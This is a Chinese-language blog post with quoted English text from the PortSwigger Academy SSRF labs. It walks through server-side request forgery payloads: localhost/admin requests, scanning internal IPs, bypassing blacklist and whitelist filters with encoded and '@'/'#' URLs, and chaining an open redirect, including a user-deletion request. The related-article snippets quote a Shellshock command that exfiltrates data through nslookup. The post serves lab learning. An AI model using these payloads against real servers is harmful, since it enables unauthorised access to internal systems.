SSRF攻击实例解析

最新推荐文章于 2024-04-22 15:25:43 发布
最新推荐文章于 2024-04-22 15:25:43 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: 网络安全学习 文章标签: SSRF 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119724749
版权

普通版SSRF:

普通版版本的SSRF没有经过任何过滤
直接在请求的API中输入:

http://localhost/admin

比如:

stockApi=http://localhost/admin

Here, the server will fetch(获取) the contents(内容) of the /admin URL and return it to the user.

SSRF攻击后端系统:

SSRF攻击是操纵了服务器的权限,服务器存储于后端系统
我们可以用爆破的方法,爆破后端系统的IP地址,然后对其进行操作:
比如:

http://192.168.0.x/admin

是一个后端系统,但是x的值我们不知道,然后我们就可以进行爆破:
使用Python脚本先 生成一个0~255的字典:

def printnumber(path):
    with open(path,'a') as f:
        for i in range(0,256):
            f.write(str(i)+"\n")
            
printnumber("a.txt")

然后将字典导入brupsuite,爆破即可。

规避常见的SSRF防御:

SSRF with blacklist-based(基于黑名单) input filters

Some applications block input containing hostnames(包含主机名) like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent(绕过) the filter(过滤器) using various techniques:

  • Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001(八进制), or 127.1.
  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose(目的).
  • Obfuscating(混淆) blocked strings using URL encoding or case(大小写) variation(变化).使用URL编码或大小写变化混淆被阻止的字符串

比如:当:

 http://127.0.0.1/

没有用的时候,可以变成

http://127.1/

当:

http://127.1/admin

没有用的时候,可以尝试将a转码变成:%2561

http://127.1/%2561dmin

即可

SSRF with whitelist-based(基于白名单) input filters

Some applications only allow input that matches, begins with, or contains, a whitelist of permitted values. In this situation, you can sometimes circumvent(绕过) the filter by exploiting inconsistencies(解析不一致性) in URL parsing(解析)。

The URL specification(规范) contains a number of features that are liable(可能) to be overlooked(忽略) when implementing(执行)parsing and validation of URLs:

  • You can embed credentials(嵌入凭据) in a URL before the hostname, using the @ character. For example: https://expected-host@evil-host.
  • You can use the # character to indicate(表示) a URL fragment(片段). For example: https://evil-host#expected-host.
  • You can leverage the DNS naming hierarchy(命名层次结构) to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host.
  • You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
    您可以使用URL编码字符来混淆URL解析代码。如果实现过滤器的代码处理URL编码字符的方式与执行后端HTTP请求的代码不同,则这一点特别有用
  • You can use combinations of these techniques together.

例如
输入

 http://127.0.0.1/

看看是否能够通过回显白名单进行进一步攻击:

%2523是#

http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

Bypassing SSRF filters via open redirection(重定向)

It is sometimes possible to circumvent any kind of filter-based defenses by exploiting an open redirection vulnerability.

In the preceding SSRF example, suppose the user-submitted URL is strictly validated to prevent malicious exploitation of the SSRF behavior. However, the application whose URLs are allowed contains an open redirection vulnerability. Provided the API used to make the back-end HTTP request supports redirections, you can construct a URL that satisfies the filter and results in a redirected request to the desired back-end target.

有时可以利用开放重定向漏洞绕过任何类型的基于过滤器的防御。
在前面的SSRF示例中,假设用户提交的URL经过严格验证,以防止恶意利用SSRF行为。但是,允许URL的应用程序包含开放重定向漏洞。如果用于使后端HTTP请求支持重定向的API,则可以构造满足筛选器要求的URL,并将请求重定向到所需的后端目标。

For example, suppose the application contains an open redirection vulnerability(漏洞) in which the following URL:

/product/nextProduct?currentProductId=6&path=http://evil-user.net

returns a redirection to:

http://evil-user.net

You can leverage the open redirection vulnerability to bypass the URL filter, and exploit the SSRF vulnerability as follows:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

This SSRF exploit works because the application first validates that the supplied URL is on an allowed domain, which it is. The application then requests the supplied URL, which triggers the open redirection. It follows the redirection, and makes a request to the internal URL of the attacker’s choosing.
此SSRF攻击之所以有效,是因为应用程序首先验证提供的URL是否位于允许的域上,而该域是允许的。然后,应用程序请求提供的URL,从而触发打开重定向。它遵循重定向,并向攻击者选择的内部URL发出请求

如图,是一个明显的重定向漏洞:

在这里插入图片描述
在这里插入图片描述

Zeker62
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSRF-01】服务器端请求伪造漏洞原理及利用实例
m0_64378913的博客
07-04 1241
背景:互联网上的很多Web应用提供了从其他服务器(也可以是本地)获取数据的功能,使用用户指定的URL,Web应用可以获取图片、文件资源(下载或读取)。定义:SSRF (Server-Side Request Forgery),服务器端请求伪造,是强制服务器发起由攻击者伪造的请求的一种安全漏洞。 请求伪造,顾名思义就是攻击者伪造正常的请求,以达到攻击的目的,就是常见的Web安全漏洞之一。如果“请求伪造”发生在服务器端,那么这个漏洞就叫做“服务器端请求伪造”即SSRF。例如:百度识图功能。 用户可以从本地或UR
SSRF-bp靶场
qq_53510194的博客
03-26 305
User-agent()输入 { :;/usr/bin/nslookup $(whoami).bp域名 执行命令。1.要求域名必须是stock.weliketoshop.net(常规的请求地址)在另一翻页处(next product),发现类似的path参数,内容为路径。猜测两处公用一个api(stockApi),构造新的stockApi进行测试。@绕过白名单,解码出来的#锁定127.0.0.1。url中的#:<域名>#<位置标识符>url中的@:<用户名>@<域名>找到删除用户的url,改包放包。
什么是SSRF攻击?该如何防御SSRF攻击
最新发布
dexunyun的博客
04-22 970
并且,由于云服务和体系结构的复杂性,SSRF攻击产生的影响也非常大。SSRF 形成的原因大都是由于服务端提供了从其它服务器获取数据的功能,比如使用户从指定的URL web应用获取图片、下载文件、读取文件内容等,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发送请求,并返回对该目标地址请求的数据。1、严格校验用户输入的URL,可以使用白名单过滤来限制输入,只允许特定的协议、主机和端口,列如限制请求的端口为 http 常用的端口,80、443、8080、8090 等。
实战 | SSRF攻击内网的实战案例
weixin_43167326的博客
02-03 870
推荐查看: 实战 | 记一次SSRF攻击内网的实战案例 实战 | 记两次应急响应小记 干货 | Wordpress网站渗透方法指南 实战 | 记一次CTF题引发的0day挖掘 2023年零基础+进阶系统化白帽黑客学习 实战 | 记一次邮件系统C段引发的SQL手注和内网渗透
29.CSRF及SSRF漏洞案例讲解
mingyqf的博客
12-30 2766
CSRF&SSRF】—漏洞案例讲解—day29 一、CSRF—跨站请求伪造攻击 1、解释 CSRF漏洞解释,原理 CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 XSS 利用站点内内的信任用户,盗取cookie CS
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 1357
Portwigge的Web安全漏洞训练平台SSRF通关
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 757
文章目录总结什么是SSRF?SSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
第一节 SSRF原理介绍-01
09-15
SSRF漏洞代码分析: 存在SSRF漏洞代码示例如下: function curl($url){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_HEADER,0); curl_exec($ch); curl_close($ch); } $url = ...
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
服务器端请求伪造(SSRF)易受攻击的实验室 该存储库包含容易受到服务器端请求伪造(SSRF)攻击PHP代码。 我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的鼓励)以及在DNS重新绑定攻击基础上共同努力的研究人员说谢谢 脆弱代码旨在针对以下5种情况演示SSRF: 1.提取并显示指定文件内容的应用程序代码 在编程语言中,有一些函数可以获取本地保存文件的内容。 这些功能可能能够从远程URL以及本地文件(例如PHP中的file_get_contents)中获取内容。 如果应用程序未在用户提供的数据之前添加任何字符串以从文件中获取内容,即应用程序未在提供用户提供的数据的目录名或路径,则该功能可能会被滥用。 在这种情况下,这些数据获取功能可以处理“ http://”或“ file://”之
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
ssrf漏洞原理和案例演示
北冥有鱼
06-01 1799
SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方法又有不一样 PH...
Web安全SSRF漏洞
热门推荐
我不是大牛
07-04 2万+
内容 SSRF漏洞的危害 SSRF漏洞的挖掘 SSRF漏洞的防御 SSRF漏洞原理概述 背景 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 概述 很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片...
SSRF漏洞原理和案例演示
weixin_44749329的博客
06-03 918
SSRF漏洞原理和案例演示 SSRF:其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入注意的地址让后端服务器对其发起请求,并返回对该目标地址请求数据 数据流:攻击者---->服务器---->目标地址 根据后台的函数的不同,对其应用的影响和利用方法又有不一样 PHP中下面函数的使用不当会导致SSRF: file_get...
CSRF和SSRF漏洞案例讲解
weixin_46739058的博客
04-09 3287
CSRF的概念 CSRF:跨站请求伪造(Cross-site request forgery)CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。当用户访问含有恶意代码的网页时,会向指定正常网站发送非本人意愿的数据请求包(如转账给hack,向hack发送API等)如果此时用户恰好登录了该正常网站(也就是身份验证是正常的)就会执行该恶意代码的请求,从而造成CSRF。 与在XSS章节中提到的在博客里写入获取cookie的代码,在管理员登录后台查看时就会窃取其cookie有异曲..
基于pikachu靶场实施SSRF攻击
05-23
SSRF(Server-Side Request Forgery)攻击是一种利用目标服务器上的漏洞,将服务器发出的请求定向到攻击者指定的服务器上的攻击方式。 在实施SSRF攻击时,可以利用pikachu靶场搭建的Web应用程序进行测试和练习。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值